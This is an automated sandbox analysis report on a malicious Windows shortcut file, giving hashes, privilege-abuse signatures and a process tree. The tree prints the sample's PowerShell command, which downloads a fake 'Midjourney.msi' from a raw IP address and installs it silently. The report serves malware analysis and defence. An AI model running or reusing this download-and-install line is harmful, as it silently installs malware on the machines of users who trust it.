Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
04-10-2024 01:06
Static task
static1
Behavioral task
behavioral1
Sample
106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f.lnk
Resource
win7-20240708-en
windows7-x64
5 signatures
150 seconds
General
-
Target
106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f.lnk
-
Size
3KB
-
MD5
2aed3939fbf8f1967d68fcc746771889
-
SHA1
eb04819a97ca2cf33211c6ea323a9c77cdfacfcf
-
SHA256
106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f
-
SHA512
0d45000b7a470655668e5c0c95aaab3911b75b3f4163abb02f9b6e987e070ad02af144d5f791ebf6940c5c838f35ff55f7c0b906ade62f47dde6ad9ff1750b1c
Score
8/10
Malware Config
Signatures
-
pid Process 1508 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1508 powershell.exe Token: SeShutdownPrivilege 2684 msiexec.exe Token: SeIncreaseQuotaPrivilege 2684 msiexec.exe Token: SeRestorePrivilege 2620 msiexec.exe Token: SeTakeOwnershipPrivilege 2620 msiexec.exe Token: SeSecurityPrivilege 2620 msiexec.exe Token: SeCreateTokenPrivilege 2684 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2684 msiexec.exe Token: SeLockMemoryPrivilege 2684 msiexec.exe Token: SeIncreaseQuotaPrivilege 2684 msiexec.exe Token: SeMachineAccountPrivilege 2684 msiexec.exe Token: SeTcbPrivilege 2684 msiexec.exe Token: SeSecurityPrivilege 2684 msiexec.exe Token: SeTakeOwnershipPrivilege 2684 msiexec.exe Token: SeLoadDriverPrivilege 2684 msiexec.exe Token: SeSystemProfilePrivilege 2684 msiexec.exe Token: SeSystemtimePrivilege 2684 msiexec.exe Token: SeProfSingleProcessPrivilege 2684 msiexec.exe Token: SeIncBasePriorityPrivilege 2684 msiexec.exe Token: SeCreatePagefilePrivilege 2684 msiexec.exe Token: SeCreatePermanentPrivilege 2684 msiexec.exe Token: SeBackupPrivilege 2684 msiexec.exe Token: SeRestorePrivilege 2684 msiexec.exe Token: SeShutdownPrivilege 2684 msiexec.exe Token: SeDebugPrivilege 2684 msiexec.exe Token: SeAuditPrivilege 2684 msiexec.exe Token: SeSystemEnvironmentPrivilege 2684 msiexec.exe Token: SeChangeNotifyPrivilege 2684 msiexec.exe Token: SeRemoteShutdownPrivilege 2684 msiexec.exe Token: SeUndockPrivilege 2684 msiexec.exe Token: SeSyncAgentPrivilege 2684 msiexec.exe Token: SeEnableDelegationPrivilege 2684 msiexec.exe Token: SeManageVolumePrivilege 2684 msiexec.exe Token: SeImpersonatePrivilege 2684 msiexec.exe Token: SeCreateGlobalPrivilege 2684 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2756 wrote to memory of 1508 2756 cmd.exe 32 PID 2756 wrote to memory of 1508 2756 cmd.exe 32 PID 2756 wrote to memory of 1508 2756 cmd.exe 32 PID 1508 wrote to memory of 2684 1508 powershell.exe 33 PID 1508 wrote to memory of 2684 1508 powershell.exe 33 PID 1508 wrote to memory of 2684 1508 powershell.exe 33 PID 1508 wrote to memory of 2684 1508 powershell.exe 33 PID 1508 wrote to memory of 2684 1508 powershell.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\106c81f547cfe8332110520c968062004ca58bcfd2dbb0accd51616dd694721f.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://193.242.145.138/mid/w1/Midjourney.msi" -OutFile "C:\Users\Admin\AppData\Roaming\y.msi";msiexec /i C:\Users\Admin\AppData\Roaming\y.msi /qn2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\y.msi /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620